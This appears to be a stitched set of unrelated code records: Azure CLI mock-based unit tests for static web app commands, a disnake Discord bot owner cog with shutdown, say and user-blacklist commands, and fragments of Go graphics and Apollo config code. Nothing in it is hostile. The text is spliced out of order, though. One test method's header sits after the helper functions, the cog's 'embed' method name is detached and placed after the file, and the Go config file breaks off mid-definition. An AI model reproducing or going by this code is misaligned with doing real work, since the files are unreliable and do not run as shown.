} | normal.Set(px, py, pz)
normal.Normalize()
|
test_staticapp_commands_thru_mock.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import unittest
from unittest import mock
from azure.cli.command_modules.appservice.static_sites import \
list_staticsites, show_staticsite, delete_staticsite, create_staticsites, CLIError, disconnect_staticsite, \
reconnect_staticsite, list_staticsite_environments, show_staticsite_environment, list_staticsite_domains, \
set_staticsite_domain, delete_staticsite_domain, list_staticsite_functions, list_staticsite_app_settings, \
set_staticsite_app_settings, delete_staticsite_app_settings, list_staticsite_users, \
invite_staticsite_users, update_staticsite_users, update_staticsite, list_staticsite_secrets, \
reset_staticsite_api_key, delete_staticsite_environment, link_user_function, unlink_user_function, get_user_function, \
assign_identity, remove_identity, show_identity
from azure.core.exceptions import ResourceNotFoundError
class TestStaticAppCommands(unittest.TestCase):
def setUp(self):
_set_up_client_mock(self)
_set_up_fake_apps(self)
def test_list_empty_staticapp(self):
self.staticapp_client.list.return_value = []
response = list_staticsites(self.mock_cmd)
self.assertEqual(len(response), 0)
def test_list_staticapp_with_resourcegroup(self):
self.staticapp_client.get_static_sites_by_resource_group.return_value = [self.app1]
response = list_staticsites(self.mock_cmd, self.rg1)
self.staticapp_client.get_static_sites_by_resource_group.assert_called_once_with(self.rg1)
self.assertEqual(len(response), 1)
self.assertIn(self.app1, response)
def test_list_staticapp_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
response = list_staticsites(self.mock_cmd)
self.assertEqual(len(response), 2)
self.assertIn(self.app1, response)
self.assertIn(self.app2, response)
def test_show_staticapp_with_resourcegroup(self):
self.staticapp_client.get_static_site.return_value = self.app1
response = show_staticsite(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.get_static_site.assert_called_once_with(self.rg1, self.name1)
self.assertEqual(self.app1, response)
def test_show_staticapp_without_resourcegroup(self):
self.staticapp_client.get_static_site.return_value = self.app1
self.staticapp_client.list.return_value = [self.app1, self.app2]
response = show_staticsite(self.mock_cmd, self.name1)
self.staticapp_client.get_static_site.assert_called_once_with(self.rg1, self.name1)
self.assertEqual(self.app1, response)
def test_show_staticapp_not_exist(self):
self.staticapp_client.get_static_site.return_value = self.app1
self.staticapp_client.list.return_value = [self.app1, self.app2]
with self.assertRaises(CLIError):
show_staticsite(self.mock_cmd, self.name1_not_exist)
def test_delete_staticapp_with_resourcegroup(self):
delete_staticsite(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.begin_delete_static_site.assert_called_once_with(resource_group_name=self.rg1, name=self.name1)
def test_delete_staticapp_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
delete_staticsite(self.mock_cmd, self.name1)
self.staticapp_client.begin_delete_static_site.assert_called_once_with(resource_group_name=self.rg1, name=self.name1)
def test_delete_staticapp_not_exist(self):
with self.assertRaises(CLIError):
delete_staticsite(self.mock_cmd, self.name1_not_exist)
def test_create_staticapp(self):
from azure.mgmt.web.models import StaticSiteARMResource, StaticSiteBuildProperties, SkuDescription
self.mock_cmd.get_models.return_value = StaticSiteARMResource, StaticSiteBuildProperties, SkuDescription
app_location = './src'
api_location = './api/'
output_location = '/.git/'
tags = {'key1': 'value1'}
with mock.patch("azure.cli.command_modules.appservice.static_sites.show_staticsite", side_effect=ResourceNotFoundError("msg")):
create_staticsites(
self.mock_cmd, self.rg1, self.name1, self.location1,
self.source1, self.branch1, self.token1,
app_location=app_location, api_location=api_location, output_location=output_location,
tags=tags)
self.staticapp_client.begin_create_or_update_static_site.assert_called_once()
arg_list = self.staticapp_client.begin_create_or_update_static_site.call_args[1]
self.assertEqual(self.name1, arg_list["name"])
self.assertEqual(self.rg1, arg_list["resource_group_name"])
self.assertEqual(self.location1, arg_list["static_site_envelope"].location)
self.assertEqual(self.source1, arg_list["static_site_envelope"].repository_url)
self.assertEqual(self.branch1, arg_list["static_site_envelope"].branch)
self.assertEqual(tags, arg_list["static_site_envelope"].tags)
self.assertEqual('Free', arg_list["static_site_envelope"].sku.name)
self.assertEqual(app_location, arg_list["static_site_envelope"].build_properties.app_location)
self.assertEqual(api_location, arg_list["static_site_envelope"].build_properties.api_location)
self.assertEqual(output_location, arg_list["static_site_envelope"].build_properties.app_artifact_location)
# assert that a duplicate create call doesn't raise an error or call client create method again
create_staticsites(
self.mock_cmd, self.rg1, self.name1, self.location1,
self.source1, self.branch1, self.token1,
app_location=app_location, api_location=api_location, output_location=output_location,
tags=tags)
self.staticapp_client.begin_create_or_update_static_site.assert_called_once()
def test_create_staticapp_with_standard_sku(self):
from azure.mgmt.web.models import StaticSiteARMResource, StaticSiteBuildProperties, SkuDescription
self.mock_cmd.get_models.return_value = StaticSiteARMResource, StaticSiteBuildProperties, SkuDescription
with mock.patch("azure.cli.command_modules.appservice.static_sites.show_staticsite", side_effect=ResourceNotFoundError("msg")):
create_staticsites(
self.mock_cmd, self.rg1, self.name1, self.location1,
self.source1, self.branch1, self.token1, sku='standard')
self.staticapp_client.begin_create_or_update_static_site.assert_called_once()
arg_list = self.staticapp_client.begin_create_or_update_static_site.call_args[1]
self.assertEqual('Standard', arg_list["static_site_envelope"].sku.name)
def test_create_staticapp_missing_token(self):
app_location = './src'
api_location = './api/'
output_location = '/.git/'
tags = {'key1': 'value1'}
with self.assertRaises(CLIError):
with mock.patch("azure.cli.command_modules.appservice.static_sites.show_staticsite", side_effect=ResourceNotFoundError("msg")):
create_staticsites(
self.mock_cmd, self.rg1, self.name1, self.location1,
self.source1, self.branch1,
app_location=app_location, api_location=api_location, output_location=output_location,
tags=tags)
def test_update_staticapp(self):
from azure.mgmt.web.models import StaticSiteARMResource, SkuDescription
self.mock_cmd.get_models.return_value = StaticSiteARMResource, SkuDescription
self.staticapp_client.get_static_site.return_value = self.app1
self.staticapp_client.list.return_value = [self.app1, self.app2]
tags = {'key1': 'value1'}
sku = 'Standard'
update_staticsite(self.mock_cmd, self.name1, self.source2, self.branch2, self.token2, tags=tags, sku=sku)
self.staticapp_client.update_static_site.assert_called_once()
arg_list = self.staticapp_client.update_static_site.call_args[1]
self.assertEqual(self.name1, arg_list["name"])
self.assertEqual(self.source2, arg_list["static_site_envelope"].repository_url)
self.assertEqual(self.branch2, arg_list["static_site_envelope"].branch)
self.assertEqual(self.token2, arg_list["static_site_envelope"].repository_token)
self.assertEqual(tags, arg_list["static_site_envelope"].tags)
self.assertEqual(sku, arg_list["static_site_envelope"].sku.name)
def test_update_staticapp_with_no_values_passed_in(self):
from azure.mgmt.web.models import StaticSiteARMResource, SkuDescription
self.mock_cmd.get_models.return_value = StaticSiteARMResource, SkuDescription
self.staticapp_client.get_static_site.return_value = self.app1
self.staticapp_client.list.return_value = [self.app1, self.app2]
update_staticsite(self.mock_cmd, self.name1)
self.staticapp_client.update_static_site.assert_called_once()
arg_list = self.staticapp_client.update_static_site.call_args[1]
self.assertEqual(self.name1, arg_list["name"])
self.assertEqual(self.source1, arg_list["static_site_envelope"].repository_url)
self.assertEqual(self.branch1, arg_list["static_site_envelope"].branch)
self.assertEqual(self.token1, arg_list["static_site_envelope"].repository_token)
self.assertEqual(self.app1.tags, arg_list["static_site_envelope"].tags)
self.assertEqual('Free', arg_list["static_site_envelope"].sku.name)
def test_update_staticapp_not_exist(self):
from azure.mgmt.web.models import StaticSiteARMResource, SkuDescription
self.mock_cmd.get_models.return_value = StaticSiteARMResource, SkuDescription
self.staticapp_client.get_static_site.return_value = self.app1
self.staticapp_client.list.return_value = [self.app1, self.app2]
with self.assertRaises(CLIError):
update_staticsite(self.mock_cmd, self.name1_not_exist)
def test_disconnect_staticapp_with_resourcegroup(self):
disconnect_staticsite(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.begin_detach_static_site.assert_called_once_with(resource_group_name=self.rg1, name=self.name1) |
disconnect_staticsite(self.mock_cmd, self.name1)
self.staticapp_client.begin_detach_static_site.assert_called_once_with(resource_group_name=self.rg1, name=self.name1)
@mock.patch('azure.cli.command_modules.appservice.static_sites.create_staticsites', autospec=True)
def test_reconnect_staticapp_with_resourcegroup(self, create_staticsites_mock):
self.staticapp_client.list.return_value = [self.app1, self.app2]
reconnect_staticsite(self.mock_cmd, self.name1, self.source1, self.branch1, self.token1,
resource_group_name=self.rg1)
create_staticsites_mock.assert_called_once_with(self.mock_cmd, self.rg1, self.name1, self.location1,
self.source1, self.branch1, self.token1, login_with_github=False, no_wait=False)
@mock.patch('azure.cli.command_modules.appservice.static_sites.create_staticsites', autospec=True)
def test_reconnect_staticapp_without_resourcegroup(self, create_staticsites_mock):
self.staticapp_client.list.return_value = [self.app1, self.app2]
reconnect_staticsite(self.mock_cmd, self.name1, self.source1, self.branch1, self.token1)
create_staticsites_mock.assert_called_once_with(self.mock_cmd, self.rg1, self.name1, self.location1,
self.source1, self.branch1, self.token1, login_with_github=False, no_wait=False)
def test_list_staticsite_environments_with_resourcegroup(self):
list_staticsite_environments(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.get_static_site_builds.assert_called_once_with(self.rg1, self.name1)
def test_list_staticsite_environments_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
list_staticsite_environments(self.mock_cmd, self.name1)
self.staticapp_client.get_static_site_builds.assert_called_once_with(self.rg1, self.name1)
def test_show_staticsite_environment_with_resourcegroup(self):
show_staticsite_environment(self.mock_cmd, self.name1, self.environment1, self.rg1)
self.staticapp_client.get_static_site_build.assert_called_once_with(self.rg1, self.name1, self.environment1)
def test_show_staticsite_environment_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
show_staticsite_environment(self.mock_cmd, self.name1, self.environment1)
self.staticapp_client.get_static_site_build.assert_called_once_with(self.rg1, self.name1, self.environment1)
def test_set_staticsite_domain_with_resourcegroup(self):
set_staticsite_domain(self.mock_cmd, self.name1, self.hostname1, self.rg1)
self.staticapp_client.begin_validate_custom_domain_can_be_added_to_static_site.assert_called_once_with(
self.rg1, self.name1, self.hostname1, self.hostname1_validation)
self.staticapp_client.begin_create_or_update_static_site_custom_domain.assert_called_once_with(
resource_group_name=self.rg1, name=self.name1, domain_name=self.hostname1,
static_site_custom_domain_request_properties_envelope=self.hostname1_validation)
def test_set_staticsite_domain_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
set_staticsite_domain(self.mock_cmd, self.name1, self.hostname1)
self.staticapp_client.begin_validate_custom_domain_can_be_added_to_static_site.assert_called_once_with(
self.rg1, self.name1, self.hostname1, self.hostname1_validation)
self.staticapp_client.begin_create_or_update_static_site_custom_domain.assert_called_once_with(
resource_group_name=self.rg1, name=self.name1, domain_name=self.hostname1,
static_site_custom_domain_request_properties_envelope=self.hostname1_validation)
def test_delete_staticsite_domain_with_resourcegroup(self):
delete_staticsite_domain(self.mock_cmd, self.name1, self.hostname1, self.rg1)
self.staticapp_client.begin_delete_static_site_custom_domain.assert_called_once_with(
resource_group_name=self.rg1, name=self.name1, domain_name=self.hostname1)
def test_delete_staticsite_domain_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
delete_staticsite_domain(self.mock_cmd, self.name1, self.hostname1)
self.staticapp_client.begin_delete_static_site_custom_domain.assert_called_once_with(
resource_group_name=self.rg1, name=self.name1, domain_name=self.hostname1)
def test_delete_staticsite_environment_with_resourcegroup(self):
delete_staticsite_environment(self.mock_cmd, self.name1, self.environment1, self.rg1)
self.staticapp_client.begin_delete_static_site_build.assert_called_once_with(self.rg1, self.name1, self.environment1)
def test_delete_staticsite_environment_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
delete_staticsite_environment(self.mock_cmd, self.name1, self.environment1)
self.staticapp_client.begin_delete_static_site_build.assert_called_once_with(self.rg1, self.name1, self.environment1)
def test_list_staticsite_functions_with_resourcegroup(self):
list_staticsite_functions(self.mock_cmd, self.name1, self.rg1, self.environment1)
self.staticapp_client.list_static_site_build_functions.assert_called_once_with(
self.rg1, self.name1, self.environment1)
def test_list_staticsite_functions_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
list_staticsite_functions(self.mock_cmd, self.name1, environment_name=self.environment1)
self.staticapp_client.list_static_site_build_functions.assert_called_once_with(
self.rg1, self.name1, self.environment1)
def test_list_staticsite_app_settings_with_resourcegroup(self):
list_staticsite_app_settings(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.list_static_site_app_settings.assert_called_once_with(
self.rg1, self.name1)
def test_list_staticsite_app_settings_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
list_staticsite_app_settings(self.mock_cmd, self.name1)
self.staticapp_client.list_static_site_app_settings.assert_called_once_with(
self.rg1, self.name1)
def test_set_staticsite_app_settings_with_resourcegroup(self):
from azure.mgmt.web.models import StringDictionary
app_settings1_input = ['key1=val1', 'key2=val2==', 'key3=val3=']
self.staticapp_client.list_static_site_app_settings.return_value = StringDictionary(properties={})
set_staticsite_app_settings(self.mock_cmd, self.name1, app_settings1_input, self.rg1)
self.staticapp_client.create_or_update_static_site_app_settings.assert_called_once()
def test_set_staticsite_app_settings_without_resourcegroup(self):
from azure.mgmt.web.models import StringDictionary
app_settings1_input = ['key1=val1', 'key2=val2==', 'key3=val3=']
self.staticapp_client.list.return_value = [self.app1, self.app2]
self.staticapp_client.list_static_site_app_settings.return_value = StringDictionary(properties={})
set_staticsite_app_settings(self.mock_cmd, self.name1, app_settings1_input)
self.staticapp_client.create_or_update_static_site_app_settings.assert_called_once()
def test_delete_staticsite_app_settings_with_resourcegroup(self):
# setup
current_app_settings = {'key1': 'val1', 'key2': 'val2'}
app_settings_keys_to_delete = ['key1']
class AppSettings:
properties = current_app_settings
self.staticapp_client.list_static_site_app_settings.return_value = AppSettings
# action
delete_staticsite_app_settings(self.mock_cmd, self.name1, app_settings_keys_to_delete, self.rg1)
# validate
self.staticapp_client.create_or_update_static_site_app_settings.assert_called_once()
def test_delete_staticsite_app_settings_without_resourcegroup(self):
# setup
current_app_settings = {'key1': 'val1', 'key2': 'val2'}
app_settings_keys_to_delete = ['key1']
class AppSettings:
properties = current_app_settings
self.staticapp_client.list_static_site_app_settings.return_value = AppSettings
self.staticapp_client.list.return_value = [self.app1, self.app2]
# action
delete_staticsite_app_settings(self.mock_cmd, self.name1, app_settings_keys_to_delete)
# validate
self.staticapp_client.create_or_update_static_site_app_settings.assert_called_once()
def test_list_staticsite_users_with_resourcegroup(self):
authentication_provider = 'GitHub'
list_staticsite_users(self.mock_cmd, self.name1, self.rg1, authentication_provider=authentication_provider)
self.staticapp_client.list_static_site_users.assert_called_once_with(
self.rg1, self.name1, authentication_provider)
def test_list_staticsite_users_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
authentication_provider = 'GitHub'
list_staticsite_users(self.mock_cmd, self.name1, authentication_provider=authentication_provider)
self.staticapp_client.list_static_site_users.assert_called_once_with(
self.rg1, self.name1, authentication_provider)
def test_invite_staticsite_users_with_resourcegroup(self):
authentication_provider = 'GitHub'
user_details = 'JohnDoe'
roles = 'Contributor,Reviewer'
invitation_expiration_in_hours = 2
from azure.mgmt.web.models import StaticSiteUserInvitationRequestResource
self.mock_cmd.get_models.return_value = StaticSiteUserInvitationRequestResource
invite_staticsite_users(self.mock_cmd, self.name1, authentication_provider, user_details, self.hostname1,
roles, invitation_expiration_in_hours, self.rg1)
arg_list = self.staticapp_client.create_user_roles_invitation_link.call_args[0]
self.assertEqual(self.rg1, arg_list[0])
self.assertEqual(self.name1, arg_list[1])
self.assertEqual(self.hostname1, arg_list[2].domain)
self.assertEqual(authentication_provider, arg_list[2].provider)
self.assertEqual(user_details, arg_list[2].user_details)
self.assertEqual(invitation_expiration_in_hours, arg_list[2].num_hours_to_expiration)
def test_invite_staticsite_users_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
authentication_provider = 'GitHub'
user_details = 'JohnDoe'
roles = 'Contributor,Reviewer'
invitation_expiration_in_hours = 2
from azure.mgmt.web.models import StaticSiteUserInvitationRequestResource
self.mock_cmd.get_models.return_value = StaticSiteUserInvitationRequestResource
invite_staticsite_users(self.mock_cmd, self.name1, authentication_provider, user_details, self.hostname1,
roles, invitation_expiration_in_hours)
arg_list = self.staticapp_client.create_user_roles_invitation_link.call_args[0]
self.assertEqual(self.rg1, arg_list[0])
self.assertEqual(self.name1, arg_list[1])
self.assertEqual(self.hostname1, arg_list[2].domain)
self.assertEqual(authentication_provider, arg_list[2].provider)
self.assertEqual(user_details, arg_list[2].user_details)
self.assertEqual(invitation_expiration_in_hours, arg_list[2].num_hours_to_expiration)
def test_update_staticsite_users_with_resourcegroup_with_all_args(self):
roles = 'Contributor,Reviewer'
authentication_provider = 'GitHub'
user_details = 'JohnDoe'
user_id = 100
update_staticsite_users(self.mock_cmd, self.name1, roles, authentication_provider=authentication_provider,
user_details=user_details, user_id=user_id, resource_group_name=self.rg1)
self.staticapp_client.update_static_site_user.assert_called_once_with(
self.rg1, self.name1, authentication_provider, user_id, roles=roles)
def test_update_staticsite_users_with_resourcegroup_without_auth_provider(self):
roles = 'Contributor,Reviewer'
user_details = 'JohnDoe'
authentication_provider = 'GitHub'
user_id = '100'
_mock_list_users_for_without_auth_provider(self, user_id, authentication_provider, user_details)
update_staticsite_users(self.mock_cmd, self.name1, roles,
user_details=user_details, user_id=user_id, resource_group_name=self.rg1)
self.staticapp_client.update_static_site_user.assert_called_once_with(
self.rg1, self.name1, authentication_provider, user_id, roles=roles)
def test_update_staticsite_users_with_resourcegroup_without_auth_provider_user_not_found(self):
roles = 'Contributor,Reviewer'
user_details = 'JohnDoe'
user_id = '100'
_mock_list_users_for_without_auth_provider(self, 'other_user_id',
'dummy_authentication_provider', 'dummy_user_details')
with self.assertRaises(CLIError):
update_staticsite_users(self.mock_cmd, self.name1, roles,
user_details=user_details, user_id=user_id, resource_group_name=self.rg1)
def test_update_staticsite_users_with_resourcegroup_without_user_id_without_auth_provider(self):
roles = 'Contributor,Reviewer'
user_details = 'JohnDoe'
authentication_provider = 'GitHub'
user_id = '100'
_mock_list_users_for_without_auth_provider(self, user_id, authentication_provider, user_details)
update_staticsite_users(self.mock_cmd, self.name1, roles,
user_details=user_details, resource_group_name=self.rg1)
self.staticapp_client.update_static_site_user.assert_called_once_with(
self.rg1, self.name1, authentication_provider, user_id, roles=roles)
def test_update_staticsite_users_with_resourcegroup_without_user_id_without_auth_provider_user_not_found(self):
roles = 'Contributor,Reviewer'
user_details = 'JohnDoe'
_mock_list_users_for_without_auth_provider(self, 'dummy_user_id', 'dummy_authentication_provider',
'other_user_details')
with self.assertRaises(CLIError):
update_staticsite_users(self.mock_cmd, self.name1, roles,
user_details=user_details, resource_group_name=self.rg1)
def test_update_staticsite_users_with_resourcegroup_without_user_id(self):
roles = 'Contributor,Reviewer'
user_details = 'JohnDoe'
authentication_provider = 'GitHub'
user_id = '100'
_mock_list_users_for_without_auth_provider(self, user_id, authentication_provider, user_details)
update_staticsite_users(self.mock_cmd, self.name1, roles, authentication_provider=authentication_provider,
user_details=user_details, resource_group_name=self.rg1)
self.staticapp_client.update_static_site_user.assert_called_once_with(
self.rg1, self.name1, authentication_provider, user_id, roles=roles)
def test_update_staticsite_users_with_resourcegroup_without_user_id_user_not_found(self):
roles = 'Contributor,Reviewer'
user_details = 'JohnDoe'
authentication_provider = 'GitHub'
_mock_list_users_for_without_auth_provider(self, 'dummy_user_id', 'dummy_authentication_provider',
'other_user_details')
with self.assertRaises(CLIError):
update_staticsite_users(self.mock_cmd, self.name1, roles, authentication_provider=authentication_provider,
user_details=user_details, resource_group_name=self.rg1)
def test_update_staticsite_users_with_resourcegroup_without_user_id_without_user_details(self):
roles = 'Contributor,Reviewer'
user_details = 'JohnDoe'
authentication_provider = 'GitHub'
user_id = '100'
_mock_list_users_for_without_auth_provider(self, user_id, authentication_provider, user_details)
with self.assertRaises(CLIError):
update_staticsite_users(self.mock_cmd, self.name1, roles, authentication_provider=authentication_provider,
resource_group_name=self.rg1)
def test_list_staticsite_secrets(self):
from azure.mgmt.web.models import StringDictionary
self.staticapp_client.list_static_site_secrets.return_value = StringDictionary(properties={"apiKey": "key"})
secret = list_staticsite_secrets(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.list_static_site_secrets.assert_called_once_with(resource_group_name=self.rg1, name=self.name1)
from ast import literal_eval
self.assertEqual(literal_eval(secret.__str__())["properties"]["apiKey"], "key")
def test_staticsite_identity_assign(self):
from azure.mgmt.web.models import ManagedServiceIdentity, ManagedServiceIdentityType
self.mock_cmd.get_models.return_value = ManagedServiceIdentity, ManagedServiceIdentityType
assign_identity(self.mock_cmd, self.rg1, self.name1)
self.staticapp_client.begin_create_or_update_static_site.assert_called_once()
def test_staticsite_identity_remove(self):
from azure.mgmt.web.models import ManagedServiceIdentityType, Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties
get_models = lambda s: ManagedServiceIdentityType if s == "ManagedServiceIdentityType" else Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties
self.mock_cmd.get_models.side_effect = get_models
remove_identity(self.mock_cmd, self.rg1, self.name1)
self.staticapp_client.begin_create_or_update_static_site.assert_called_once()
def test_staticsite_identity_show(self):
mock_site = mock.MagicMock()
mock_site.identity = "identity"
self.staticapp_client.get_static_site.return_value = mock_site
self.assertEqual(show_identity(self.mock_cmd, self.rg1, self.name1), "identity")
def test_reset_staticsite_api_key(self):
from azure.mgmt.web.models import StringDictionary, StaticSiteResetPropertiesARMResource
self.staticapp_client.get_static_site.return_value = self.app1
self.staticapp_client.reset_static_site_api_key.return_value = StringDictionary(properties={"apiKey": "new_key"})
self.mock_cmd.get_models.return_value = StaticSiteResetPropertiesARMResource
secret = reset_staticsite_api_key(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.get_static_site.assert_called_once_with(self.rg1, self.name1)
self.mock_cmd.get_models.assert_called_once_with('StaticSiteResetPropertiesARMResource')
self.staticapp_client.reset_static_site_api_key.assert_called_once()
from ast import literal_eval
reset_envelope = literal_eval(self.staticapp_client.reset_static_site_api_key.call_args[1]["reset_properties_envelope"].__str__())
self.assertEqual(reset_envelope["repository_token"], self.token1)
@mock.patch("azure.cli.command_modules.appservice.static_sites.show_functionapp")
def test_functions_link(self, *args, **kwargs):
functionapp_name = "functionapp"
functionapp_resource_id = "/subscriptions/sub/resourceGroups/{}/providers/Microsoft.Web/sites/{}".format(
self.rg1, functionapp_name
)
link_user_function(self.mock_cmd, self.name1, self.rg1, functionapp_resource_id)
self.staticapp_client.begin_register_user_provided_function_app_with_static_site.assert_called_once()
@mock.patch("azure.cli.command_modules.appservice.static_sites.get_user_function", return_value=[mock.MagicMock()])
def test_functions_unlink(self, *args, **kwargs):
unlink_user_function(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.detach_user_provided_function_app_from_static_site.assert_called_once()
def test_functions_show(self, *args, **kwargs):
get_user_function(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.get_user_provided_function_apps_for_static_site.assert_called_once()
def _set_up_client_mock(self):
self.mock_cmd = mock.MagicMock()
self.mock_cmd.cli_ctx = mock.MagicMock()
self.staticapp_client = mock.MagicMock()
client_factory_patcher = mock.patch(
'azure.cli.command_modules.appservice.static_sites._get_staticsites_client_factory', autospec=True)
self.addCleanup(client_factory_patcher.stop)
self.mock_static_site_client_factory = client_factory_patcher.start()
self.mock_static_site_client_factory.return_value = self.staticapp_client
def _set_up_fake_apps(self):
from azure.mgmt.web.models import StaticSiteCustomDomainRequestPropertiesARMResource
self.rg1 = 'rg1'
self.name1 = 'name1'
self.name1_not_exist = 'name1_not_exist'
self.location1 = 'location1'
self.source1 = 'https://github.com/Contoso/My-First-Static-App'
self.branch1 = 'dev'
self.token1 = 'TOKEN_1'
self.environment1 = 'default'
self.hostname1 = 'www.app1.com'
self.hostname1_validation = StaticSiteCustomDomainRequestPropertiesARMResource(validation_method="cname-delegation")
self.app1 = _contruct_static_site_object(
self.rg1, self.name1, self.location1,
self.source1, self.branch1, self.token1)
self.rg2 = 'rg2'
self.name2 = 'name2'
self.location2 = 'location2'
self.source2 = 'https://github.com/Contoso/My-Second-Static-App'
self.branch2 = 'master'
self.token2 = 'TOKEN_2'
self.environment1 = 'prod'
self.hostname1 = 'www.app2.com'
self.app2 = _contruct_static_site_object(
self.rg2, self.name2, self.location2,
self.source2, self.branch2, self.token2)
def _contruct_static_site_object(rg, app_name, location, source, branch, token):
from azure.mgmt.web.models import StaticSiteARMResource, SkuDescription
app = StaticSiteARMResource(
location=location,
repository_url=source,
branch=branch,
repository_token=token,
sku=SkuDescription(name='Free', tier='Free'))
app.name = app_name
app.id = \
"/subscriptions/sub/resourceGroups/{}/providers/Microsoft.Web/staticSites/{}".format(rg, app_name)
return app
def _mock_list_users_for_without_auth_provider(self, user_id, authentication_provider, user_details):
class User:
def __init__(self, name, provider, display_name):
self.name = name
self.provider = provider
self.display_name = display_name
user1 = User(user_id, authentication_provider, user_details)
user2 = User(user_id + '2', authentication_provider + '2', user_details + '2')
self.staticapp_client.list_static_site_users.return_value = [user1, user2] |
def test_disconnect_staticapp_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2] |
owner-normal.py | import json
import os
import sys
import disnake
from disnake.ext import commands
from disnake.ext.commands import Context
from helpers import json_manager, checks
import logging
if not os.path.isfile("../config.json"):
sys.exit("'config.json' not found by general-normal! Please add it and try again.")
else:
with open("../config.json") as file:
config = json.load(file)
''' Logging '''
logger = logging.getLogger('discord')
logger.setLevel(logging.INFO)
handler = logging.FileHandler(filename='../logs/discord.log', encoding='utf-8',mode='w')
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
logger.addHandler(handler)
class Owner(commands.Cog, name="owner-normal"):
def __init__(self, bot):
self.bot = bot
@commands.command(
name="shutdown",
description="Make the bot shutdown.",
)
@checks.is_owner()
async def shutdown(self, context: Context):
"""
Makes the bot shutdown.
"""
embed = disnake.Embed(
description="Shutting down. Bye! :wave:",
color=0x9C84EF
)
logger.info(f"Shutting down. Bye! :wave:")
await context.send(embed=embed)
await self.bot.close()
@commands.command(
name="say",
description="The bot will say anything you want.",
)
@checks.is_owner()
async def say(self, context: Context, *, message: str):
"""
The bot will say anything you want.
"""
logger.info(f"Saying '{message}'")
await context.send(message)
@commands.command(
name="embed",
description="The bot will say anything you want, but within embeds.",
)
@checks.is_owner()
async def | (self, context: Context, *, message: str):
"""
The bot will say anything you want, but within embeds.
"""
embed = disnake.Embed(
description=message,
color=0x9C84EF
)
logger.info(f"Saying '{message}'")
await context.send(embed=embed)
@commands.group(
name="blacklist"
)
async def blacklist(self, context: Context):
"""
Lets you add or remove a user from not being able to use the bot.
"""
if context.invoked_subcommand is None:
with open("../data/blacklist.json") as file:
blacklist = json.load(file)
embed = disnake.Embed(
title=f"There are currently {len(blacklist['ids'])} blacklisted IDs",
description=f"{', '.join(str(id) for id in blacklist['ids'])}",
color=0x9C84EF
)
await context.send(embed=embed)
@blacklist.command(
name="add"
)
async def blacklist_add(self, context: Context, member: disnake.Member = None):
"""
Lets you add a user from not being able to use the bot.
"""
try:
user_id = member.id
with open("../data/blacklist.json") as file:
blacklist = json.load(file)
if user_id in blacklist['ids']:
embed = disnake.Embed(
title="Error!",
description=f"**{member.name}** is already in the blacklist.",
color=0xE02B2B
)
return await context.send(embed=embed)
json_manager.add_user_to_blacklist(user_id)
embed = disnake.Embed(
title="User Blacklisted",
description=f"**{member.name}** has been successfully added to the blacklist",
color=0x9C84EF
)
with open("../data/blacklist.json") as file:
blacklist = json.load(file)
embed.set_footer(
text=f"There are now {len(blacklist['ids'])} users in the blacklist"
)
logger.info(f"{member.name} has been added to the blacklist.")
await context.send(embed=embed)
except:
embed = disnake.Embed(
title="Error!",
description=f"An unknown error occurred when trying to add **{member.name}** to the blacklist.",
color=0xE02B2B
)
await context.send(embed=embed)
@blacklist.command(
name="remove"
)
async def blacklist_remove(self, context, member: disnake.Member = None):
"""
Lets you remove a user from not being able to use the bot.
"""
try:
user_id = member.id
json_manager.remove_user_from_blacklist(user_id)
embed = disnake.Embed(
title="User removed from blacklist",
description=f"**{member.name}** has been successfully removed from the blacklist",
color=0x9C84EF
)
with open("../data/blacklist.json") as file:
blacklist = json.load(file)
embed.set_footer(
text=f"There are now {len(blacklist['ids'])} users in the blacklist"
)
logger.info(f"{member.name} has been removed from the blacklist.")
await context.send(embed=embed)
except:
embed = disnake.Embed(
title="Error!",
description=f"**{member.name}** is not in the blacklist.",
color=0xE02B2B
)
await context.send(embed=embed)
def setup(bot):
bot.add_cog(Owner(bot)) | embed |
init_config.go | package core
import (
"encoding/json"
"github.com/thinmonkey/apollosdk/util"
"io/ioutil"
"os"
"time"
)
type ConfitUtil struct {
ApolloInitConfig
CacheInitConfig
HttpRefreshInterval time.Duration
HttpTimeout time.Duration
HttpOnErrorRetryInterval time.Duration
LongPollingInitDelay time.Duration
LongPollingTimeout time.Duration
configStartFile map[string]interface{}
}
type ApolloInitConfig struct {
AppId string
Cluster string
DataCenter string
MetaServer string
}
type CacheInitConfig struct {
MaxConfigCacheSize int
ConfigCacheExpireTime int
}
func newDefaultConfigUtil() *ConfitUtil {
configUtil := ConfitUtil{
HttpRefreshInterval: 5 * time.Minute,
HttpTimeout: 30 * time.Second,
HttpOnErrorRetryInterval: 1 * time.Second,
LongPollingInitDelay: 2 * time.Second,
LongPollingTimeout: 60 * time.Second,
CacheInitConfig: CacheInitConfig{
MaxConfigCacheSize: 50 * 1024 * 1024,
